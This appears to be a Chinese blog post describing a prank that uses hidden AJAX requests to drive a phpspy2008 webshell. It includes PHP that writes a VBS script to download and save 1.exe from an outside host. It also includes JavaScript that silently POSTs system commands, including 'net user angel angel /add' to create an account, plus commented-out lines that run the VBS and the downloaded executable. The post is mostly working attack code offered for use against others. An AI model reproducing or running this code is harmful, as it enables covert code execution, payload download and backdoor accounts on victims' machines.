本来想给小黑群里的人开个玩笑。谁知道经过小黑的csrf实例后,大家都先看代码了。这下我明白了。小黑用过的招数都不能再用了。再用就不灵了。因为小黑太黑,让人印象深刻。
还是记录一下吧,ajax真的是隐秘性很高。我是这样来利用的。比较彻底。
PHP代码
- elseif ($doing == 'writevbs') {
- $fp = @fopen('c:/angel.vbs','w');
- $vbs = "Set love = CreateObject(\"Microsoft.XMLHTTP\")\n".
- "love.Open \"GET\",\"http://www.4ngel.net/1.exe\",0\n".
- "love.Send()\n".
- "Set you = CreateObject(\"ADODB.Stream\")\n".
- "you.Mode = 3\n".
- "you.Type = 1\n".
- "you.Open()\n".
- "you.Write(love.responseBody)\n".
- "you.SaveToFile \"c:\\1.exe\",2";
- @fwrite($fp,$vbs);
- @fclose($fp);
- }
加了一段代码是生成一个VBS脚本。这段脚本的作用从4ngel.net上下载一个1.exe文件保存到他本地的1.exe,然后有一段是AJAX的功能代码。
JavaScript代码
- <script type="text/javascript">
- var http_request = false;
- function makeRequest(url, httpType, sendData) {
- http_request = false;
- if (!httpType) httpType = "GET";
- if (window.XMLHttpRequest) { // Non-IE...
- http_request = new XMLHttpRequest();
- if (http_request.overrideMimeType) {
- http_request.overrideMimeType('text/plain');
- }
- } else if (window.ActiveXObject) { // IE
- try {
- http_request = new ActiveXObject("Msxml2.XMLHTTP");
- } catch (e) {
- try {
- http_request = new ActiveXObject("Microsoft.XMLHTTP");
- } catch (e) {}
- }
- }
- if (!http_request) {
- alert('Cannot send an XMLHTTP request');
- return false;
- }
- http_request.open(httpType, url, true);
- http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- http_request.send(sendData);
- }
- //makeRequest('<?=$self?>', 'POST', 'action=file&doing=writevbs');
- //makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\angel.vbs');
- //makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\1.exe');
- makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=net user angel angel /add');
- makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');
- </script>
最后几句是以POST方式请求本地测试环境中的phpspy2008,调用命令执行功能,生成vbs,然后执行VBS。再执行下载的exe文件。不过我已经注释掉了。这样在本地测试是成功的。对待自己兄弟们不能这么心狠。所以就注释掉了。加了一个用户。
我只是想说。AJAX作为一个现在逐渐受到重视的技术,在强调增加用户体验的同时,带来的安全也是神不知鬼不觉的。因为他的请求。你根本察觉不到。更具体的应用还是要靠大家自己去领悟了。
